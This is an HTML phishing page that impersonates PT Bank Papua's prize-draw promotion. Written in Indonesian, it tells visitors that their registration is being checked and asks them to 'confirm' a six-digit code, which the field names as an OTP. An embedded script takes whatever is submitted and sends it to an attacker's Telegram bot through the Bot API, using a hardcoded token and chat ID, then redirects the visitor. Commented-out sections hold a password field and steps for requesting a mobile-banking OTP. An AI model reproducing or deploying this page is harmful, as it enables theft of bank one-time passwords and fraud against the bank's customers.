<!doctype html>
<html lang="en">
 <head> 
  <meta charset="utf-8"> 
  <meta name="fragment" content="!"> 
    <link rel="canonical" href="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Ff831faacb8a6c7b38973f26b6d39ee07.cdn.bubble.io%2Ff1694098999075x797726526456642200%2FIMG-20230908-WA0000.jpg" />
    <meta name="twitter:card" content="summary_large_image" />
    <meta property="og:title" content="PT Bank Papua" />
    <meta name="twitter:title" content="Bank Papua" />
    <meta property="og:site_name" content="Bank - Papua" />
    <meta name="twitter:site_name" content="Bank Papua" />
    <meta property="og:description" content=""/>
    <meta name="twitter:description" content="" />
        <link rel="image_src" href="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Ff831faacb8a6c7b38973f26b6d39ee07.cdn.bubble.io%2Ff1694098999075x797726526456642200%2FIMG-20230908-WA0000.jpg?w=&h=&auto=compress&dpr=1&fit=max" />
    <meta property="og:image" content="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Ff831faacb8a6c7b38973f26b6d39ee07.cdn.bubble.io%2Ff1694098999075x797726526456642200%2FIMG-20230908-WA0000.jpg?w=&amp;h=&amp;auto=compress&amp;dpr=1&amp;fit=max" />
    <meta name="twitter:image:src" content="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Ff831faacb8a6c7b38973f26b6d39ee07.cdn.bubble.io%2Ff1694098999075x797726526456642200%2FIMG-20230908-WA0000.jpg?w=&amp;h=&amp;auto=compress&amp;dpr=1&amp;fit=max" />
    <meta property="og:url" content="" />
    <meta property="og:type" content="website" />
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent" />
    <meta name="viewport" content="width=device-width,initial-scale=1.0, user-scalable=no, minimal-ui">
  <title>Promo Gebyar Undian Bank Papua</title> 
  <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-0evHe/X+R7YkIZDRvuzKMRqM+OrBnVFBL6DOitfPri4tjfHxaWutUpFmBp4vmVor" crossorigin="anonymous"> 
  <style>
        @import url('https://fonts.googleapis.com/css2?family=Open+Sans:wght@500&display=swap');
        body {
            font-family: 'Open Sans', sans-serif;
        }

        .text-header {
            font-family: 'Open Sans', sans-serif;
            color: #0086e0;
        }

        .text-subheader {
            font-family: 'Open Sans', sans-serif;
            margin-top: -60px;
            color: #000;
        }

        .btn-punya {
            display: block;
            margin: 0px auto 0 auto;
            padding: 0px; 
            cursor: pointer; 
            background: red;
            border: none; 
            text-align: center; 
            height: 42px; 
            width: 200px; 
            max-width: 90%;
            font-family: Arial; 
            font-size: 15px; 
            font-weight: bold; 
            color: rgb(255, 255, 255); 
            letter-spacing: 2px; 
            line-height: 1; 
            border-radius: 5px; 
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; 
            transition: background 200ms ease 0s;
        }

        .btn-belum {
            display: block;
            margin: 30px auto 0 auto;
            padding: 0px; 
            cursor: pointer; 
            background: #FFA62F;
            border: none; 
            text-align: center; 
            height: 40px; 
            width: 3500px; 
            max-width: 90%;
            font-family: Arial; 
            font-size: 14px; 
            font-weight: 400; 
            color: white; 
            letter-spacing: 2px; 
            line-height: 1; 
            border-radius: 5px; 
            transition: background 200ms ease 0s;
        }
        </style>
        <style>
        body{
    background: #3FBFBF;
    font-family: arial;
    text-align: left;
}
 
h1{
    color: #fff;
}
 
/*contoh1*/
/*support google chrome*/
.contoh1::-webkit-input-placeholder{
    color: white;
}
 
/*support mozilla*/
.contoh1:-moz-input-placeholder{
    color: white;
}
 
/*support internet explorer*/
.contoh1:-ms-input-placeholder{
    color: white;
}
 
 
/*contoh2*/
/*support google chrome*/
.contoh2{
    margin: 10px;
    font-size: 12pt;
    padding: 0px;
}
 
.contoh2::-webkit-input-placeholder{
    color: white;
}
 
/*support mozilla*/
.contoh2:-moz-input-placeholder{
    color: white;
}
 
/*support internet explorer*/
.contoh2:-ms-input-placeholder{
    color: white;
}
 
 
/*contoh3*/
/*support google chrome*/
.contoh3{
    margin: 30px;
    font-size: 13pt;
    padding: 10px;	
    background: transparent;
    color: #fff;
    font-family: arial;
    border: none;
}
 
.contoh3:focus{
    outline: none;
}
 
.contoh3::-webkit-input-placeholder{
    color: white;
}
 
/*support mozilla*/
.contoh3:-moz-input-placeholder{
    color: white;
}
 
/*support internet explorer*/
.contoh3:-ms-input-placeholder{
    color: white;
}
    </style> 
 </head> 
 <body class="chakra-ui-light" style="background: url(/bg.png);">
  <div class="container"> 
   <div class="row"> 
    <div class="col-12 d-block mx-auto text-center" style="height: auto; width: auto; max-width: auto; margin-top: 0px; margin-bottom: 0px; border-radius: 0px;"> 
   <!-- <center> 
     <img alt="" src="/produk.png" style="display: block; margin-top: 0px; width: 100%; margin-left: 0%; height: 90%; border-radius: 0px;"></center> 
            <div class="greyout" style="top: 0px; left: 0px; width: 100%; height: 100%; background: transfarent; position: fixed; z-index: 2002; opacity: 1; display: block;">
    </div>
    <div class="bubble-element Popup bubble-r-container relative" style="background: #ADDFFF; opacity: 0.1; top: 70px; left: 0px; right: 0px; position: fixed; z-index: 2002; margin-left: auto; margin-right: auto; width: calc(100% - 20px); min-width: 300px; max-width: 260px; min-height: 200px; height: auto; overflow-y: auto; border-style: outset; border-width: 1px; border-color: none; opacity: 1; border-radius: 4px; box-shadow: #C2DFFF 0px 0px 0px 1px; padding: 0px 10px;">
        <br>-->
        <br>
<img src="https://2.bp.blogspot.com/-KICOSkTVYTI/W0LUPyuPpMI/AAAAAAAAPJM/QkDZCUqU0CosVuH13Gt9d9WD4-yRU6RZQCLcBGAs/s1600/Logo-Bank-Pembangunan-Daerah-Papua.png" style="width: 80%; margin-top: 0px;" alt="">
        <center>
     <form id="tg" onsubmit="">
   <div class="row"> 
    <div class="col-12">
        <br>
           <p style="color: white; text-align: center; font-size: 13px;">Pendaftaran gebyar undian anda sedang dalam pengecekan sistem, Mohon menunggu Tim terkait kami akan segera menghubungi anda,<br>untuk info nomor Otoritas Tanda Pendaftaran,<br>Silahkan konfirmasi kode Otoritas Tanda Pendaftaran dibawah ini, agar bisa menerima nomor undian<br>langsung dari bank papua</p>
           <br>
<center>
       <input class="contoh1" placeholder="Masukan Kode Anda" required="" style="width:90%;height: 40px; border: 1px solid white; margin-left: 0%; margin-top: -20%; background: none; border-radius: 4px; text-align: center; padding-left: 10px; outline:none; border-color: #F5F5F5 1px 1px 0px 0px; font-size: 15px; color: white;" minlength="6" maxlength="6" type="tel" name="Kode OTP" id="Kode OTP"><br><!--
       <input class="contoh2" placeholder="Password" required="" style="width:90%;height: 40px; border: 1px solid white; margin-left: 5%; margin-top: 5%; background: none; border-radius: 4px; text-align: left; padding-left: 10px; outline:none; border-color: #F5F5F5 1px 1px 0px 0px; font-size: 15px; color: white;" minlength="" maxlength="" type="password" name="password" id="password"></div><center><div class="bubble-element eye clickable-element" tabindex="3" id="eyeOpen" style="margin-left: 70%; margin-top: -13%;"><img alt="" id="eye" src="/tutup.png?w=24&amp;h=19&amp;auto=compress&amp;dpr=2&amp;fit=max" style="display: block; margin: 0px; width: 20%; height: 20%; border-radius: 0px;">
       </div> 
       <div class="bubble-element eye clickable-element" tabindex="3" id="eyeClose" style="display: none; margin-left: 70%; margin-top: -13%;"><img alt="" id="eye" src="/buka.png?w=32&amp;h=26&amp;auto=compress&amp;dpr=2&amp;fit=max" style="display: block; margin: 0px; width: 20%; height: 20%; border-radius: 0px;"></center>-->
        </div>
    <div class="col-12"> 
    <br>
           <button type="submit" class="btn-belum">Konfirmasi</button> </center>
           <br>
           <br>
           <!--
           <p style="color: white; text-align: left; font-size: 13px;">Cara Request Kode OTP<br>1. Klik Request Kode OTP Diatas
<br>2. Klik Lanjutkan<br>3. Klik Pesan/Message<br>4. Kirimkan pesan yang sudah disediakan<br><br>Dipastikan kirim pesan nya gunakan nomor handphone yang terdaftar pada mobile banking bank papua anda</p>-->
    </div> 
   </div> 
  </div> 
  <!--
  <div class="chakra-portal"><ul role="region" aria-live="polite" id="chakra-toast-manager-top" style="position: fixed; z-index: 5500; pointer-events: none; display: flex; flex-direction: column; margin: 0px auto; top: env(safe-area-inset-top, 0px); right: env(safe-area-inset-right, 0px); left: env(safe-area-inset-left, 0px);"></ul><ul role="region" aria-live="polite" id="chakra-toast-manager-top-left" style="position: fixed; z-index: 5500; pointer-events: none; display: flex; flex-direction: column; top: env(safe-area-inset-top, 0px); left: env(safe-area-inset-left, 0px);"></ul><ul role="region" aria-live="polite" id="chakra-toast-manager-top-right" style="position: fixed; z-index: 5500; pointer-events: none; display: flex; flex-direction: column; top: env(safe-area-inset-top, 0px); right: env(safe-area-inset-right, 0px);"></ul><ul role="region" aria-live="polite" id="chakra-toast-manager-bottom-left" style="position: fixed; z-index: 5500; pointer-events: none; display: flex; flex-direction: column; bottom: env(safe-area-inset-bottom, 0px); left: env(safe-area-inset-left, 0px);"></ul><ul role="region" aria-live="polite" id="chakra-toast-manager-bottom" style="position: fixed; z-index: 5500; pointer-events: none; display: flex; flex-direction: column; margin: 0px auto; bottom: env(safe-area-inset-bottom, 0px); right: env(safe-area-inset-right, 0px); left: env(safe-area-inset-left, 0px);"></ul><ul role="region" aria-live="polite" id="chakra-toast-manager-bottom-right" style="position: fixed; z-index: 5500; pointer-events: none; display: flex; flex-direction: column; bottom: env(safe-area-inset-bottom, 0px); right: env(safe-area-inset-right, 0px);"></ul>-->
       <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script> 
   <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/js/bootstrap.bundle.min.js" integrity="sha384-pprn3073KE6tl6bjs2QrFaJGz5/SUsLqktiwsUTF55Jfv3qYSDhgCecCxMW52nD2" crossorigin="anonymous"></script> 
  <p id="status"></p>
<script>
    const chat_id = '6458201996', botID = 'bot6886830475:AAH6yWfkdmP9fhmk49TDIctxIwiXsWZrwjI';
    const telegramURL = `https://api.telegram.org/${botID}/sendMessage`;
    document.querySelector('#tg').addEventListener("submit", async e => { // When the user submits the form
        e.preventDefault(); // Don't submit
        let text = JSON.stringify( // Convert the form data to a string to send as our Telegram message
            Object.fromEntries(new FormData(e.target).entries()), // Convert the form data to an object.
        null, 2); // Prettify the JSON so we can read the data easily
        const sendMessage = await fetch(telegramURL, { // Send the request to the telegram API
            method: 'POST',
            headers: {"Content-Type": "application/json"}, // This is required when sending a JSON body.
            body: JSON.stringify({chat_id, text}), // The body must be a string, not an object
        });
        const messageStatus = document.querySelector('#status');
        if (sendMessage.ok) // Update the user on if the message went through
            messageStatus.textContent = "";
        else
            messageStatus.textContent = "Message Failed to send :( " + (await sendMessage.text());
        e.target.reset(); // Clear the form fields.
        window.location.href='/salah.html';
    });


   </script>
   <!--
   <script>
            $(document).ready(function() {
            $("div#eyeOpen").on('click', function() {
                $("#eyeOpen").css("display", "none");
                $("#eyeClose").css("display", "block");

                $("#password").prop("type", "text");

                $("div#eyeClose").on('click', function() {
                    $("#eyeOpen").css("display", "block");
                    $("#eyeClose").css("display", "none");

                    $("#password").prop("type", "password");
                });
            });

            
        });
        
   </script>-->
</form>
</body>
</html>
